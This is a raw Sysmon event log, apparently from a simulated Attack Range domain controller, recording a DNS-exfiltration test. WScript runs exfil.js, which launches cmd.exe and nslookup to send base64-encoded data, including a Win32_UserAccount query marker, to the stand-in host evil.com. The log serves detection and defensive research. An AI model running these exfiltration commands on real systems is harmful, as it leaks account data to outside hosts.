22542200x8000000000000000215137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.300{00000000-0000-0000-0000-000000000000}7224evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.221{00000000-0000-0000-0000-000000000000}6008evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.130{00000000-0000-0000-0000-000000000000}1220evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.062{00000000-0000-0000-0000-000000000000}7672evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000215133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.906{2E1864BB-18FD-629A-2B46-000000005F02}25166712C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-2C46-000000005F02}4672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.906{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.906{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.906{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.906{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.906{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2C46-000000005F02}4672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.906{2E1864BB-18FD-629A-2A46-000000005F02}77684248C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-2C46-000000005F02}4672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.908{2E1864BB-18FD-629A-2C46-000000005F02}4672C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-2A46-000000005F02}7768C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkssah.tmp 2>&1 10341000x8000000000000000215125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.867{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-2B46-000000005F02}2516C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.867{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-2B46-000000005F02}2516C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.867{2E1864BB-18FD-629A-2B46-000000005F02}25166712C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-2A46-000000005F02}7768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.867{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2B46-000000005F02}2516C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.851{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.851{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.851{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.851{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.851{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2A46-000000005F02}7768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.851{2E1864BB-18E0-629A-6742-000000005F02}39763548C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-2A46-000000005F02}7768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.861{2E1864BB-18FD-629A-2A46-000000005F02}7768C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkssah.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.851{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlctsiaw.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.820{2E1864BB-18FD-629A-2846-000000005F02}78247736C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-2946-000000005F02}6092C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.820{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.820{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.820{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.820{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.820{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2946-000000005F02}6092C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.820{2E1864BB-18FD-629A-2746-000000005F02}75884808C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-2946-000000005F02}6092C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.830{2E1864BB-18FD-629A-2946-000000005F02}6092C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-2746-000000005F02}7588C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlctsiaw.tmp 2>&1 10341000x8000000000000000215105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.804{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-2846-000000005F02}7824C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.804{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-2846-000000005F02}7824C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.804{2E1864BB-18FD-629A-2846-000000005F02}78247736C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-2746-000000005F02}7588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 